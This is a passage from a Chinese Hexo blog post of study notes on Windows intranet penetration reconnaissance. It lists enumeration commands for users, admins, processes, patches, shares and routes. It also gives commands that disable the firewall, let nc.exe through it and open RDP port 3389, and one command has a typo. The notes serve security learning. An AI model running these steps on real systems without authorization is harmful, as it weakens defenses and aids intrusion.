<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"taies.github.io","root":"/","scheme":"Muse","version":"7.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="内网渗透 ——（1）信息搜集[TOC] WMIC脚本自动收集WMIC 脚本的下载地址为 http:&#x2F;&#x2F;www.fuzzysecurity.com&#x2F;scripts&#x2F;files&#x2F;wmic_info.rar。执行脚本后， 会将所有结果写入一个 HTML 文件 本机信息收集获取操作系统和版本信息123systeminfo | findstr &#x2F;B &#x2F;C:&quot;OS Name&amp;qu">
<meta property="og:type" content="article">
<meta property="og:title" content="学习笔记&#x2F;内网渗透-信息搜集">
<meta property="og:url" content="https://taies.github.io/2019/12/21/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/index.html">
<meta property="og:site_name" content="tale&#39;s blog">
<meta property="og:description" content="内网渗透 ——（1）信息搜集[TOC] WMIC脚本自动收集WMIC 脚本的下载地址为 http:&#x2F;&#x2F;www.fuzzysecurity.com&#x2F;scripts&#x2F;files&#x2F;wmic_info.rar。执行脚本后， 会将所有结果写入一个 HTML 文件 本机信息收集获取操作系统和版本信息123systeminfo | findstr &#x2F;B &#x2F;C:&quot;OS Name&amp;qu">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771082569625.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769423128601.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769424333900.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769425368199.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770240492688.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770241764960.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770242378896.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770242878267.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770243385102.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770243938240.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770245216403.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770246039586.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770248110360.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769426524330.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769430622296.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769432447131.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769433415381.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769434341231.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769436122124.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770249583307.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769442061895.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770252092562.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769449175718.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769453426416.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769453564264.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769456706846.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769824347886.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771089145605.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771088727116.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771091025090.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771091434560.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771093672790.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771093471966.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769828097759.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769825804661.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769826975222.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771097935264.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771098055948.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769852642734.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771100184943.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771100667318.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771104567172.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771126669354.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771127951827.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771128866487.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771131252938.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771148964139.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771149082467.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771976497576.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771977956697.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771978415865.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771984205664.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771984689634.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771985266692.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771986386657.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771986890506.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771988967613.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771989422965.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771989888535.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771991831002.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771992593818.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771993012389.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771993617480.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771994249358.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771996116149.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772015590179.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772390174429.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772402050542.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772422796930.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772426918788.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772523806482.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772531878693.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772533404901.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772536978961.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772537425820.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772538457120.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772542285078.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772572597188.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772573099930.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772576241516.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772576418913.jpg">
<meta property="og:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772580310274.jpg">
<meta property="article:published_time" content="2019-12-21T15:12:36.817Z">
<meta property="article:modified_time" content="2020-02-23T07:37:27.973Z">
<meta property="article:author" content="tale">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771082569625.jpg">

<link rel="canonical" href="https://taies.github.io/2019/12/21/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>学习笔记/内网渗透-信息搜集 | tale's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">tale's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">test</p>
  </div>

  <div class="site-nav-right"></div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="https://taies.github.io/2019/12/21/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="tale">
      <meta itemprop="description" content="tales">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="tale's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          学习笔记/内网渗透-信息搜集
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2019-12-21 23:12:36" itemprop="dateCreated datePublished" datetime="2019-12-21T23:12:36+08:00">2019-12-21</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-02-23 15:37:27" itemprop="dateModified" datetime="2020-02-23T15:37:27+08:00">2020-02-23</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="内网渗透-——（1）信息搜集"><a href="#内网渗透-——（1）信息搜集" class="headerlink" title="内网渗透 ——（1）信息搜集"></a>内网渗透 ——（1）信息搜集</h1><p>[TOC]</p>
<h2 id="WMIC脚本自动收集"><a href="#WMIC脚本自动收集" class="headerlink" title="WMIC脚本自动收集"></a>WMIC脚本自动收集</h2><p>WMIC 脚本的下载地址为 <a href="http://www.fuzzysecurity.com/scripts/files/wmic_info.rar。执行脚本后，" target="_blank" rel="noopener">http://www.fuzzysecurity.com/scripts/files/wmic_info.rar。执行脚本后，</a> 会将所有结果写入一个 HTML 文件<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771082569625.jpg" alt="-w589"></p>
<h2 id="本机信息收集"><a href="#本机信息收集" class="headerlink" title="本机信息收集"></a>本机信息收集</h2><h3 id="获取操作系统和版本信息"><a href="#获取操作系统和版本信息" class="headerlink" title="获取操作系统和版本信息"></a>获取操作系统和版本信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">systeminfo | findstr &#x2F;B &#x2F;C:&quot;OS Name&quot; &#x2F;C:&quot;OS Version&quot;</span><br><span class="line"></span><br><span class="line">systeminfo | findstr &#x2F;B &#x2F;C:&quot;OS 名称&quot; &#x2F;C:&quot;OS 版本&quot;</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769423128601.jpg" alt="-w386"></p>
<h3 id="查看安装软件以及版本，路径等"><a href="#查看安装软件以及版本，路径等" class="headerlink" title="查看安装软件以及版本，路径等"></a>查看安装软件以及版本，路径等</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic product get name,version</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769424333900.jpg" alt="-w329"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell &quot;Get-WmiObject -class Win32_Product | Select-Object -Property name,version&quot;</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769425368199.jpg" alt="-w410"></p>
<h3 id="查询本机服务信息"><a href="#查询本机服务信息" class="headerlink" title="查询本机服务信息"></a>查询本机服务信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic service list brief</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770240492688.jpg" alt="-w787"></p>
<h3 id="查询进程列表"><a href="#查询进程列表" class="headerlink" title="查询进程列表"></a>查询进程列表</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">tasklist &#x2F;v</span><br><span class="line"></span><br><span class="line">wmic process list brief</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770241764960.jpg" alt="-w997"></p>
<h3 id="查看启动程序信息"><a href="#查看启动程序信息" class="headerlink" title="查看启动程序信息"></a>查看启动程序信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic startup get command,caption</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770242378896.jpg" alt="-w834"></p>
<h3 id="查看计划任务"><a href="#查看计划任务" class="headerlink" title="查看计划任务"></a>查看计划任务</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks &#x2F;query &#x2F;fo LIST &#x2F;v</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770242878267.jpg" alt="-w696"></p>
<h3 id="查看主机开机时间"><a href="#查看主机开机时间" class="headerlink" title="查看主机开机时间"></a>查看主机开机时间</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net statistics workstation</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770243385102.jpg" alt="-w444"></p>
<h3 id="查询用户列表"><a href="#查询用户列表" class="headerlink" title="查询用户列表"></a>查询用户列表</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net user</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770243938240.jpg" alt="-w681"></p>
<h3 id="获取本地管理员（通常含有域用户）信息"><a href="#获取本地管理员（通常含有域用户）信息" class="headerlink" title="获取本地管理员（通常含有域用户）信息"></a>获取本地管理员（通常含有域用户）信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net localgroup administrators</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770245216403.jpg" alt="-w1008"></p>
<h3 id="查看当前在线用户"><a href="#查看当前在线用户" class="headerlink" title="查看当前在线用户"></a>查看当前在线用户</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">query user || qwinsta</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770246039586.jpg" alt="-w745"></p>
<h3 id="列出或断开本地计算机和连接的客户端的会话"><a href="#列出或断开本地计算机和连接的客户端的会话" class="headerlink" title="列出或断开本地计算机和连接的客户端的会话"></a>列出或断开本地计算机和连接的客户端的会话</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net session</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770248110360.jpg" alt="-w695"></p>
<h3 id="查看端口列表"><a href="#查看端口列表" class="headerlink" title="查看端口列表"></a>查看端口列表</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netstat -ano</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769426524330.jpg" alt="-w369"></p>
<h3 id="查询补丁列表"><a href="#查询补丁列表" class="headerlink" title="查询补丁列表"></a>查询补丁列表</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systeminfo</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769430622296.jpg" alt="-w320"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic qfe get description,installedOn</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769432447131.jpg" alt="-w384"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic qfe get caption,description,hotfixid,installedon</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769433415381.jpg" alt="-w391"></p>
<h3 id="查询本机共享"><a href="#查询本机共享" class="headerlink" title="查询本机共享"></a>查询本机共享</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net share</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769434341231.jpg" alt="-w255"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic share get name,path,status</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769436122124.jpg" alt="-w269"></p>
<h3 id="查询路由表及所有可用接口的-ARP-缓存表"><a href="#查询路由表及所有可用接口的-ARP-缓存表" class="headerlink" title="查询路由表及所有可用接口的 ARP 缓存表"></a>查询路由表及所有可用接口的 ARP 缓存表</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">route print</span><br><span class="line">Arp –A</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770249583307.jpg" alt="-w450"></p>
<h3 id="查询防火墙配置"><a href="#查询防火墙配置" class="headerlink" title="查询防火墙配置"></a>查询防火墙配置</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netsh firewall show config</span><br></pre></td></tr></table></figure>
<h3 id="关闭防火墙配置"><a href="#关闭防火墙配置" class="headerlink" title="关闭防火墙配置"></a>关闭防火墙配置</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">2003系统之前</span><br><span class="line">netsh firewall set opmode disable</span><br><span class="line">2003系统之后</span><br><span class="line">netsh advfirewall set aallprofiles state off</span><br></pre></td></tr></table></figure>
<h3 id="修改防火墙配置（允许指定程序全部连接）"><a href="#修改防火墙配置（允许指定程序全部连接）" class="headerlink" title="修改防火墙配置（允许指定程序全部连接）"></a>修改防火墙配置（允许指定程序全部连接）</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Windows Server 2003 系统及之前版本，允许指定程序全部连接，命令如下:</span><br><span class="line">netsh firewall add allowedprogram c:\nc.exe &quot;allow nc&quot; enable</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Windows Server 2003 之后系统版本，情况如下:</span><br><span class="line">允许指定程序连入，命令如下:</span><br><span class="line">netsh advfirewall firewall add rule name&#x3D;&quot;pass nc&quot; dir&#x3D;in action&#x3D;allow program&#x3D;&quot;C: \nc.exe&quot;</span><br><span class="line">允许指定程序连出，命令如下:</span><br><span class="line">netsh advfirewall firewall add rule name&#x3D;&quot;Allow nc&quot; dir&#x3D;out action&#x3D;allow</span><br><span class="line">program&#x3D;&quot;C: \nc.exe&quot;</span><br></pre></td></tr></table></figure>

<h3 id="不关闭防火墙，允许指定程序连接或者3389放行"><a href="#不关闭防火墙，允许指定程序连接或者3389放行" class="headerlink" title="不关闭防火墙，允许指定程序连接或者3389放行"></a>不关闭防火墙，允许指定程序连接或者3389放行</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netsh advfirewall firewall add rule name&#x3D;&quot;Remote Desktop&quot; protocol&#x3D;TCP dir&#x3D;in localport&#x3D;3389 action&#x3D;allow</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769442061895.jpg" alt="-w1013"></p>
<h3 id="查询计算机代理配置情况"><a href="#查询计算机代理配置情况" class="headerlink" title="查询计算机代理配置情况"></a>查询计算机代理配置情况</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg query &quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings&quot;</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15770252092562.jpg" alt="-w939"></p>
<h3 id="查看远程连接的端口"><a href="#查看远程连接的端口" class="headerlink" title="查看远程连接的端口"></a>查看远程连接的端口</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">REG QUERY &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot; &#x2F;v PortNumber</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769449175718.jpg" alt="-w938"></p>
<h3 id="查询并开启远程连接服务-依次图片三条命令"><a href="#查询并开启远程连接服务-依次图片三条命令" class="headerlink" title="查询并开启远程连接服务(依次图片三条命令)"></a>查询并开启远程连接服务(依次图片三条命令)</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查询</span><br><span class="line">reg add &quot;HKLM\System\CurrentControlSet\Control\Terminal Server&quot; &#x2F;v fSingleSessionPerUser &#x2F;t REG_DWORD &#x2F;d 0 &#x2F;f</span><br></pre></td></tr></table></figure>
<p>在windows2003开启3389端口：</p>
